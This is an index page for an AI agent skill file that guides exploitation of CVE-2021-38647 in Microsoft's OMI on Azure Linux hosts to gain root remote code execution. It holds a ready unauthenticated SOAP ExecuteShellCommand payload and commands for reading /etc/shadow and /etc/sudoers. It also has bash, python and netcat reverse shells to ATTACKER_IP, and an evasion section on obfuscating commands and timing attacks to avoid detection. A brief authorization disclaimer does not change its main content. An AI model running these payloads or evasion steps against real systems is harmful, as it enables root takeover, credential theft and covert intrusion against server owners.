OpenSkillIndex← back to search

Hacktricks-skills omi-cve-2021-38647-exploit

Exploit CVE-2021-38647 on Azure Linux servers running OMI (Open Management Infrastructure) to achieve root RCE. Use this skill whenever you need to test for or exploit the OMI vulnerability on ports 5985/5986, especially when you discover Azure Automation, Azure Log Analytics, or Azure Operations Management Suite services running on a target. This is critical for Azure penetration testing engagements where OMI services are detected.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/5985-5986-pentesting-omi/SKILL.MD
source content

OMI CVE-2021-38647 Exploitation

Overview

This skill helps you exploit CVE-2021-38647, a critical remote code execution vulnerability in Microsoft's Open Management Infrastructure (OMI) that affects Azure Linux deployments. The vulnerability allows unauthenticated attackers to execute commands with root privileges via the 

/wsman
endpoint.

When to Use This Skill

Use this skill when:

  • You discover ports 5985 (HTTP) or 5986 (HTTPS) open on a target
  • You identify Azure Linux servers with OMI services (Azure Automation, Log Analytics, Operations Management Suite)
  • You see the 
    omiengine
    process running on a target
  • You're conducting authorized penetration testing on Azure infrastructure
  • You need to validate OMI vulnerability exposure in a security assessment

Vulnerability Details

CVE-2021-38647 affects OMI versions prior to 1.6.10. The vulnerability exists in how OMI handles SOAP messages through the 

/wsman
endpoint:

  • No authentication required - The server incorrectly authorizes clients without authentication headers
  • Root privilege execution - Commands execute as root via the 
    omiengine
    process
  • SOAP-based attack - Exploitation uses crafted SOAP payloads with 
    ExecuteShellCommand

Quick Exploitation

Using the Built-in Script

The easiest way to exploit this vulnerability is using the provided script:

# Test connectivity and execute a command
python scripts/omi-exploit.py --target <IP> --port 5985 --command "id"

# Use HTTPS (port 5986)
python scripts/omi-exploit.py --target <IP> --port 5986 --command "whoami" --https

# Execute a reverse shell
python scripts/omi-exploit.py --target <IP> --port 5985 --command "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Manual SOAP Payload

If you prefer to craft the payload manually, use this template:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns:w="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:p="http://schemas.xmlsoap.org/ws/2004/10/policy" xmlns:tns="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
  <s:Header>
    <a:Action s:mustUnderstand="1">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem:ExecuteShellCommand</a:Action>
    <a:MessageID>uuid:12345678-1234-1234-1234-123456789012</a:MessageID>
    <a:ReplyTo>
      <a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
    </a:ReplyTo>
    <a:To s:mustUnderstand="1">http://TARGET_IP:5985/wsman</a:To>
    <w:Timeout>PT60S</w:Timeout>
  </s:Header>
  <s:Body>
    <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
      <p:command>YOUR_COMMAND_HERE</p:command>
      <p:timeout>0</p:timeout>
    </p:ExecuteShellCommand_INPUT>
  </s:Body>
</s:Envelope>

Replace 

TARGET_IP
and 
YOUR_COMMAND_HERE
with your values.

Common Commands

Reconnaissance

# Check if vulnerable (should return root)
python scripts/omi-exploit.py --target <IP> --port 5985 --command "id"

# Get system info
python scripts/omi-exploit.py --target <IP> --port 5985 --command "uname -a"

# Check OMI version
python scripts/omi-exploit.py --target <IP> --port 5985 --command "omi --version"

Privilege Escalation

# List sudoers
python scripts/omi-exploit.py --target <IP> --port 5985 --command "cat /etc/sudoers"

# Check for sensitive files
python scripts/omi-exploit.py --target <IP> --port 5985 --command "cat /etc/shadow"

# List users
python scripts/omi-exploit.py --target <IP> --port 5985 --command "cat /etc/passwd"

Reverse Shell

# Bash reverse shell
python scripts/omi-exploit.py --target <IP> --port 5985 --command "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

# Python reverse shell (if available)
python scripts/omi-exploit.py --target <IP> --port 5985 --command "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"])'"

# Netcat reverse shell (if available)
python scripts/omi-exploit.py --target <IP> --port 5985 --command "nc -e /bin/bash ATTACKER_IP 4444"

Detection and Evasion

Signs of Detection

  • Firewall rules blocking port 5985/5986
  • IDS/IPS alerts on SOAP traffic
  • OMI version patched to 1.6.10+
  • Authentication required (vulnerability not present)

Evasion Techniques

  • Use HTTPS (port 5986) to blend with legitimate traffic
  • Rate limit requests to avoid triggering alerts
  • Use encoded or obfuscated commands
  • Time attacks during maintenance windows

Verification

Before exploitation, verify the target is vulnerable:

# Check if port is open
nmap -p 5985,5986 <TARGET_IP>

# Check OMI version (if accessible)
curl -v http://<TARGET_IP>:5985/wsman

# Quick vulnerability test
python scripts/omi-exploit.py --target <IP> --port 5985 --command "echo vulnerable"

Safety and Legal Considerations

⚠️ IMPORTANT: Only use this skill on systems you have explicit authorization to test. Unauthorized exploitation of CVE-2021-38647 is illegal and can result in severe legal consequences.

  • Ensure you have written authorization before testing
  • Document all testing activities
  • Report findings to system owners
  • Do not use in production environments without approval

References

Troubleshooting

Connection Refused

  • Verify port 5985/5986 is open
  • Check firewall rules on target
  • Confirm OMI service is running

Authentication Required

  • Target may be patched (OMI 1.6.10+)
  • Vulnerability not present on this system
  • Try alternative exploitation methods

Timeout Errors

  • Increase timeout in SOAP header
  • Check network connectivity
  • Verify target is reachable

Command Execution Fails

  • Check command syntax
  • Verify command exists on target
  • Try simpler commands first (e.g., 
    id
    , 
    whoami
    )